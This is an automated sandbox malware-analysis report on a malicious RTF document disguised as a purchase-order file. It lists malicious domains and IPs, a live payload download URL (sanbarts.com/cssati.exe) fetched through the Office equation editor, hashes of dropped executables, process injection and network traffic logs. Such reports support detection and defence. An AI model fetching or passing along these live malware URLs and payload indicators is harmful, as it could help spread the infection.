https://policies.yahoo.com/w3c/p3p.xml | wuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
194.9.94.86 | sanbarts.com | Sweden | 39570 | LOOPIASE | true
98.137.244.37 | sbsfe-p8.geo.mf0.yahoodns.net | United States | 36647 | YAHOO-GQ1US | true
45.120.185.113 | 215ffbc1941f6023.7host.cn | Hong Kong | 138415 | HENGDA-HKHENGDANETWORKLIMITEDHK | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 635413
Start date and time: 2022-05-27 21:19:14 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Revised RFQ-PO180911.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@11/14@5/3
                                                      EGA Information:
                                                      • Successful, ratio: 80%
                                                      HDC Information:
                                                      • Successful, ratio: 37.8% (good quality ratio 35.1%)
                                                      • Quality average: 76.2%
                                                      • Quality standard deviation: 30.3%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .doc
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                      • TCP Packets have been reduced to 100
• Execution Graph export aborted for target EQNEDT32.EXE, PID 1544 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:20:17 | API Interceptor | 120x Sleep call for process: EQNEDT32.EXE modified
21:20:29 | API Interceptor | 24x Sleep call for process: dvukljmnr.exe modified
21:20:57 | API Interceptor | 208x Sleep call for process: wuapp.exe modified
21:21:40 | API Interceptor | 1x Sleep call for process: explorer.exe modified
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: downloaded
Size (bytes): 299113
Entropy (8bit): 7.946436383486754
Encrypted: false
SSDEEP: 6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
MD5: C6E799EEEBA0345DE98B4E9A6AC76B82
SHA1: 268BAFBD996997350D32521A0012602960C5D004
SHA-256: E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
SHA-512: B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 9%
• Antivirus: ReversingLabs, Detection: 62%
Reputation: low
IE Cache URL: http://www.sanbarts.com/cssati.exe
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):5632
                                                      Entropy (8bit):3.977045300212439
                                                      Encrypted:false
                                                      SSDEEP:48:rvl2t0MPY8hiStDY0EDK4DZSZ3w/tC7DuDd/rSCD:LlxMPXIS9TWU3wQPudf
                                                      MD5:CF5C5EA5A46EFBC81FAB97BC32950071
                                                      SHA1:E9AFF9A0F369B22BE034E728D420742920443916
                                                      SHA-256:67D139F672BFDB09E84F5CFEB3B020C8C17EC70CE5035717ACBD878EA218BA57
                                                      SHA-512:8B8388C1B667AEA9892AF5347B12AEDD72EC4F5EF92FB052252FB0EE17ACB607CE82128C4D979A5D0C576006600DBDBD2B4CE169C2EAA6F7E2BA1FCF34742904
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Reputation:low
                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.980404169406617
                                                      Encrypted:false
                                                      SSDEEP:3:tlnBknLkylfgREqAWlglqlg7tlVl3llLr1lll8v0lglwZsl8gl7vlI7:RsLhNgREqAWlgFJ7lll8vlw2FrG
                                                      MD5:8738761EA2BF10FB35D99778619F54B5
                                                      SHA1:2C2AAC95B01964FC3883FFE659670A041CFCC132
                                                      SHA-256:943B941CA0D785F23DED5B8CB332830F66D60EFDBB2BB2175E5F34D39E251534
                                                      SHA-512:F8C03355DA8405BF2DA8AA694FA3DFD74267A3403DE239570F5837D6A786CD6ED6E0FDE60CF5DC2F5E2A2EB0B385FEE4D923789C6096A323C9E3E7F67CF40B89
                                                      Malicious:false
                                                      Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.7.1.5.6.4.1.8.0.7.7.1.5.6.4.1.8.0.. =....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................b...d...f...l.............................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):189439
                                                      Entropy (8bit):7.989126055665329
                                                      Encrypted:false
                                                      SSDEEP:3072:HkPmzAMnIFKBvGchRYsnPT5EZ5aRmNGWuSN7s+hYX/EXQEZxdMipBbK91yvrCVA:Hy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVA
                                                      MD5:17179B4032C3411541C24CA24C8C9AAE
                                                      SHA1:13F54B0C026B6C7E53AA94DF8F73FA24ECAA0393
                                                      SHA-256:B82CA9A52D0AC42AEB246ED7FA0FD7F95C6248F6684B1AB8E6D973EE934CE0B9
                                                      SHA-512:6127E76EEC4D121BE3EE8A45DA44220A33AC57924255738F80EDAB3B92A7FD7D8F002779FA0F3296F3B795671767853E49DD2642EB43419E373284BFBD8B0201
                                                      Malicious:false
                                                      Preview:...4Q....Ks.SU..=V&.4.....`.vN..Au....oi.k.s%...dH}.U...I$..U-s....M...ugf...7...2\....4.d......S.....h..........8.\..@.*`.B...6h"....c.Ki.....d#....-.H....*...~.c.....906z.......6/.&.?.>[.e_u.w.RO..3#00...d.dhH%"'.I.@...wY.g{C$..=...`....A.MKHQ..&...{i...&.<....z....N..AuK...oW...s%...!H}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....90.Hk.;...f.(/..>?M....._u.w.R..'..;..@p..dhH%"'.I....Y.g.Q$.....Q.`...~.*KHQ...&....{i.kC&.*....z.Z..vN..Au....oi.k.s%...dH}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....906z.......6/..>?MR...e_u.w.R..'..;...p..dhH%"'.I....Y.g.Q$.....Q.`...~.*KHQ...&....{i.kC&.*....z.Z..vN..Au....oi.k.s%...dH}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....906z.......6/..>?MR...e_u.w.R..'..;...p..dhH%"'.I
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):191488
                                                      Entropy (8bit):6.541898820880567
                                                      Encrypted:false
                                                      SSDEEP:3072:afbnR6BqNvncvhwj8H0o45It38FSDblJpeKdsa9:MpvncWs0o4at3l9
                                                      MD5:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                      SHA1:63223BA95BFA3BF5C33B2FA08376AFC90B35465E
                                                      SHA-256:78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
                                                      SHA-512:BE4365F78F9DA5D3AB920100DEBF9A23F94101C5482DB6FBB8708913006483DF0A6DC882BAAC4D11EB942B464E548AC4F31A044F13FE6670B68DA1B95A2FDAAE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..4...4...4......4.....4......4.C.5...4...5...4...0...4......4...6...4.Rich..4.........................PE..L...1.b.................\...................p....@..........................P............@.......................................... .......................0......(...T..............................@............p...............................text....[.......\.................. ..`.rdata..fa...p...b...`..............@..@.data...,1..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):392249
                                                      Entropy (8bit):7.457203020718996
                                                      Encrypted:false
                                                      SSDEEP:6144:QPy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVOQz8jpvncWs0o4at3l9:UDZWqno5OmfYvqxd4dz81cWsIab9
                                                      MD5:6D2C377D4EAA999F9049920017F0AEBE
                                                      SHA1:C60DEEBEF6AB6F06B13801186B82B30B7EC07CF9
                                                      SHA-256:92820C32038F81C895428B292EBF5221903830336E08979AD68E54C1060B6DD8
                                                      SHA-512:588C7840DE4D228C65BA594F9837C4C29E5EB16E98FF0CE71584414CA46F396E25E45D447297D42111D743920A601902EC26EF5150501591D5CADF6DC7423956
                                                      Malicious:false
                                                      Preview:L.......,...................Q...........n.......4...........................................................................................................................................................................................................................................B...................j..........................................................................................................................................."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4830
                                                      Entropy (8bit):6.200355296128427
                                                      Encrypted:false
                                                      SSDEEP:96:lEgwdw+mcaoVVlbspZr/phpQDrbCGmrTJp4Fd0ZNN7juiOR/:11g/c/pQ3DFqBUR/
                                                      MD5:498C16613E82CEBCA0FC1541214BE952
                                                      SHA1:23E7DA2AA1B3EF5F3AEC1AE51F797DA4F421EFC5
                                                      SHA-256:7F40DA6288C8E939AFEA7A6512E518933D1802F6B822817B21E3B457AF445CE8
                                                      SHA-512:BA6B040C01B60827F893F918DE5478E83B53DA511EF62D0B10B2A12EC17F64C2FF64BD50DC1BE814809153AE90C913370010BACF22636FBD4820B409E6183A7B
                                                      Malicious:false
                                                      Preview:......].U..%..U.........x........U...|....U.t.y..y....(....._.._..y..y....(.b..._.._..y..y....(....._.._..y..y....(.<..._.._..U.......0......o_.x_.d]..U..._.._K.]..]K|...../q.]....|.._.|.._.tUd.......U....|y./y..y..0y../y.x.y..Cr... ].q. _Lt.U...y...]...._....|...........U...].t..]....-.....].''........]..]......]..].]K.].]..._.._.|]..]..]K._.]..].|.....................y................m..J..........].U..................._.|U.....].|...].|._.|].. _..}d. ...C...]..o../..._..._......o../.w._..._.......0.....(..y.......(..{yy_.t}....(y....yyy_.tU.t...U..}........].......].U..................._.|U.....].|...].|._.|].. _..}d.o...C..D^...]..o../..._..._...]..o../.w._..._...]..o../.w_..._...]........._.._L....o../.w._..._.......0.....(.....v...(..|yy_.tU.....]..]K._.}.y..y..y..y..y....zyy_.tU.t...U..}........].......].U.........d_.|U.....].|...].|._.|].. _..}d.6...C...]..o../..._..d_...]..o../.w._..d_.......0.....d(...m......(..|yy_.t}.y..y...1{y
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Sat May 28 03:20:14 2022, length=4205, window=hide
                                                      Category:dropped
                                                      Size (bytes):1064
                                                      Entropy (8bit):4.561334084261307
                                                      Encrypted:false
                                                      SSDEEP:12:8J2LpgXg/XAlCPCHaXBKBnB/xQpX+WhsxaibJticvbc2AksJJDtZ3YilMMEpxRlb:8J2T/XTRKJIoxtb2eQ243Dv3qIY7h
                                                      MD5:7A0827D76EE99E21650DB99266382AA1
                                                      SHA1:8D3328AF1607BCBA9B99539719B3C101BD51BE2D
                                                      SHA-256:EEB5D0D80D9AE296DA2B4B4D1BF6AFC4B5CBCACCF2C2948C7D4581971015CE6E
                                                      SHA-512:E5A6713869D093AA09994BA31D61067AE1360950331B8034AF17B0D7767DAA6EB63D5D4CCA1ED2C2AC44E112B110235F192D6E6DE15BF07C592C8EA4DDD70006
                                                      Malicious:false
                                                      Preview:L..................F.... ....<a..3...<a..3.....:Jr..m............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.m....T." .REVISE~1.DOC..^......hT..hT..*...r.....'...............R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\Revised RFQ-PO180911.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):91
                                                      Entropy (8bit):4.905985646870587
                                                      Encrypted:false
                                                      SSDEEP:3:bDuMJlvDzndVOLprXCmX1mQzndVOLprXCv:bCkHn+dzxn+dzs
                                                      MD5:CEBD1CC56D43DF635440E2ED8B4A5B04
                                                      SHA1:EF8682C6F0816F2C59F2F69BDE5FBF5C13133FCF
                                                      SHA-256:1A97AB0D3F171BB80E32696C0F6125743C6F20AEBA4B3FA4529EDB8277554681
                                                      SHA-512:8DC534B70B012E0E9CEDDAD42D133892FBDA6003F85E14CED563F3BC81169B81AC9A0ABE0D896E48D0A96B2DEC130067F08042EBF0EA63228DF458531E283350
                                                      Malicious:false
                                                      Preview:[folders]..Templates.LNK=0..Revised RFQ-PO180911.LNK=0..[doc]..Revised RFQ-PO180911.LNK=0..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020303
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):2
                                                      Entropy (8bit):1.0
                                                      Encrypted:false
                                                      SSDEEP:3:Qn:Qn
                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                      Malicious:false
                                                      Preview:..
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):299113
                                                      Entropy (8bit):7.946436383486754
                                                      Encrypted:false
                                                      SSDEEP:6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
                                                      MD5:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                      SHA1:268BAFBD996997350D32521A0012602960C5D004
                                                      SHA-256:E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
                                                      SHA-512:B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
                                                      Malicious:true
                                                      Antivirus:
                                                       • Antivirus: Metadefender, Detection: 9%
                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z...........2.......p....@..........................................................................s.......................................................................................p...............................text....Y.......Z.................. ..`.rdata..z....p.......^..............@..@.data...............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020303
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
                                                      File type:data
                                                      Entropy (8bit):4.757042986275398
                                                      TrID:
                                                      • Rich Text Format (4004/1) 100.00%
                                                      File name:Revised RFQ-PO180911.doc
                                                      File size:4205
                                                      MD5:afaa3f4a9a241593ea30e05773c22980
                                                      SHA1:1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
                                                      SHA256:25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
                                                      SHA512:dd13ab1647bda04ee24a67f858c477657a7029d25a03f704b5d946930b75886f3f04360b132631d220709ccf4430ce40871033441510fba5923a8355c3f1816b
                                                      SSDEEP:96:rXNv4zQBSRu6lT85c98HwedaKR/UHpTQXbfZauPjspq:r9ALHTqc98Q2fR/UJTQXjAo
                                                      TLSH:7B815D33B65C5EA7D729C5FD424B7D569252F1670FCFA840315CD99003697B08A6C1E1
                                                      File Content Preview:{\rtF3245{\object53103277 \objocx88498732\objw1025\objh9295{\*\objdata913763 {\bin00000000 {\*\objdata913763 } \*\from771564180771564180 HSSnyM9uPxlyjjXd27hWYJB7.59Zdx5NZFDEVBRnWKalWrjLy4Xp790TBCTh1QhPwoRhik6h23}.{\*\ensp
                                                      Icon Hash:e4eea2aaa4b4b4a4
                                                       Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                                                       May 27, 2022 21:20:07.545912027 CEST  49173        80         192.168.2.22     194.9.94.86
                                                       May 27, 2022 21:20:07.585800886 CEST  80           49173      194.9.94.86      192.168.2.22
                                                       May 27, 2022 21:20:07.585885048 CEST  49173        80         192.168.2.22     194.9.94.86
                                                       May 27, 2022 21:20:07.586997986 CEST  49173        80         192.168.2.22     194.9.94.86
                                                       May 27, 2022 21:20:07.625652075 CEST  80           49173      194.9.94.86      192.168.2.22
                                                       May 27, 2022 21:20:07.626665115 CEST  80           49173      194.9.94.86      192.168.2.22
                                                       May 27, 2022 21:20:07.626735926 CEST  49173        80         192.168.2.22     194.9.94.86
                                                       May 27, 2022 21:20:07.750381947 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.063146114 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.063292980 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.064167976 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.378580093 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378611088 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378627062 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378640890 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378660917 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378679037 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378696918 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378712893 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378729105 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378746986 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.378770113 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.378803968 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.378808022 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.378810883 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.389332056 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.691915035 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.691951036 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.691963911 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.691977024 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.691988945 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.692003012 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.692270994 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.721050024 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721085072 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721101046 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721113920 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721132040 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721144915 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721163034 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721175909 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721191883 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721209049 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721225023 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721242905 CEST  80           49174      45.120.185.113   192.168.2.22
                                                       May 27, 2022 21:20:08.721287966 CEST  49174        80         192.168.2.22     45.120.185.113
                                                       May 27, 2022 21:20:08.721925974 CEST  49174        80         192.168.2.22     45.120.185.113
                                                      May 27, 2022 21:20:08.721942902 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.721947908 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.777307034 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.777344942 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.777530909 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005276918 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005310059 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005328894 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005347967 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005359888 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005378962 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005394936 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005413055 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005430937 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005448103 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005453110 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005466938 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005481005 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005486012 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005486012 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.005492926 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005511045 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.005525112 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.009583950 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064732075 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064769983 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064791918 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064814091 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064835072 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064857006 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064871073 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064878941 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064901114 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064901114 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064904928 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064908028 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064915895 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064925909 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064939022 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.064949036 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:09.064964056 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:09.065027952 CEST4917480192.168.2.2245.120.185.113
